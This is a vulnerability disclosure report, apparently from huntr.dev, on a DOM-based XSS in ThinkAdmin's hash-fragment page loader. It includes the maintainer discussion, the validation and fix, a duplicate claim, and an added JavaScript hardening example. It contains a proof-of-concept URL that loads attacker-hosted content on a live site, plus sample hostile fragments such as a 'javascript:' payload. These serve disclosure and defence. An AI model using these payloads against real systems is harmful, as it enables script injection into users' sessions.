Cross-site Scripting (XSS) - DOM in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021


Description

DOM-based XSS via URL hash fragment

Proof of Concept

First log in to https://v6.thinkadmin.top, then visit https://v6.thinkadmin.top/admin.html#https://bbounty.000webhostapp.com/cors.php?id=xxxxx2 and observe that the XSS is executed.

Impact

DOM-based XSS via URL hash fragment

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back a year ago
邹景立 has invalidated this vulnerability a year ago

The framework design needs to use the hash to load page resources and allows the use of JavaScript. Therefore, such problems are inevitable and need to be used.

The disclosure bounty has been dropped
The fix bounty has been dropped
ranjit-git
a year ago

Researcher


If you want to load the hash fragment, then only allow server URLs.
Here you can see I can set any arbitrary URL and it will fetch data.

ranjit-git
a year ago

Researcher


Here in my PoC URL you can see it fetches any URL. But you need to set the URL to be fetched from your own server.
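The pattern the researcher is describing, as an added example that is not ThinkAdmin's own code: a hash-fragment page loader that takes whatever follows `#` as the URL to fetch, beside a hardened resolver that only accepts same-origin resources under the routes the application actually serves. The application origin, the `/admin/` route prefix, the function names and the sample fragments are assumptions made for illustration.

```javascript
// Added example, not ThinkAdmin's code. Assumed application origin (taken from
// the PoC host above); the route prefix allowlist below is also an assumption.
const APP_ORIGIN = "https://v6.thinkadmin.top";
const ALLOWED_PATH_PREFIXES = ["/admin/", "/admin.html"];

// Vulnerable pattern: the fragment is used as-is as the resource URL. With
// '#https://attacker.example/cors.php' (constructed sample) the page fetches an
// attacker-controlled document; if the loader then injects it with a script-
// executing sink (e.g. jQuery .html()), the attacker's JavaScript runs in the
// application's origin, which is the DOM XSS reported here.
function vulnerableResolve(hash) {
  return hash.replace(/^#/, "");
}

// Hardened resolver: parse the fragment relative to the application origin,
// then require a same-origin http(s) URL whose normalised path is allowlisted.
// Returns the canonical URL to load, or null when the fragment must be ignored.
function resolveHashTarget(hash, origin = APP_ORIGIN) {
  const raw = hash.replace(/^#/, "");
  if (raw === "") return null;

  let target;
  try {
    // Relative paths resolve against the app origin; absolute URLs keep their own
    // scheme/host, which is exactly what the origin check below catches.
    target = new URL(raw, origin + "/");
  } catch {
    return null; // unparsable fragment
  }

  // Rejects other hosts, protocol-relative '//evil.example/x' (origin differs),
  // look-alike hosts such as 'v6.thinkadmin.top.evil.example', and
  // 'javascript:' / 'data:' URLs (their origin is the opaque "null").
  if (target.origin !== new URL(origin).origin) return null;
  if (target.protocol !== "https:" && target.protocol !== "http:") return null;

  // Path traversal such as '/admin/../../x' is already normalised by the URL
  // parser, so the allowlist is applied to the canonical path.
  const pathOk = ALLOWED_PATH_PREFIXES.some(
    (p) => target.pathname === p || (p.endsWith("/") && target.pathname.startsWith(p))
  );
  if (!pathOk) return null;

  return target.href;
}

// Constructed sample fragments showing both resolvers side by side.
const SAMPLE_FRAGMENTS = [
  "#/admin/index.html",
  "#admin/user/list.html?p=2",
  "#https://attacker.example/cors.php?id=1",
  "#//attacker.example/x",
  "#javascript:alert(document.domain)",
  "#/admin/../../etc/passwd",
];

for (const fragment of SAMPLE_FRAGMENTS) {
  console.log(fragment, "->", {
    vulnerable: vulnerableResolve(fragment),
    hardened: resolveHashTarget(fragment),
  });
}
```

Restricting the fragment to same-origin paths only closes the cross-origin fetch; it does not make injecting a fetched response with a script-executing sink safe in general, so the route allowlist should be limited to templates the server actually controls.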

邹景立
a year ago

Maintainer


I'm very sorry. After careful consideration, I decided to fix this problem, but it has been closed and can't be marked.

ranjit-git
a year ago

Researcher


@admin. I am asking the admin to re-open this bug so that you can validate the bug.

邹景立
a year ago

Maintainer


OK, I also suggest the administrator to reopen it!

Jamie Slome
a year ago

Admin


I have updated the report to pending - feel free to mark it as you please!

邹景立 validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 4469f7 a year ago
邹景立 has been awarded the fix bounty
0x9x
a year ago

Nice find!

Jamie Slome
a year ago

Admin


@maintainer - just jumping in here!

We just want to know if you perceive this report to be a duplicate of:

https://huntr.dev/bounties/5c129785-cf80-4123-b869-3945b386139a/

邹景立
a year ago

Maintainer


@admin Confirm duplicate report.

0x9x
a year ago

I confirm the duplicated report, but not the verbose error reported in my original report. So I hope you can also accept my report.

Jamie Slome
a year ago

Admin


As we are in a unique situation, would both researchers be happy to split the bounty for the disclosure, half/half?
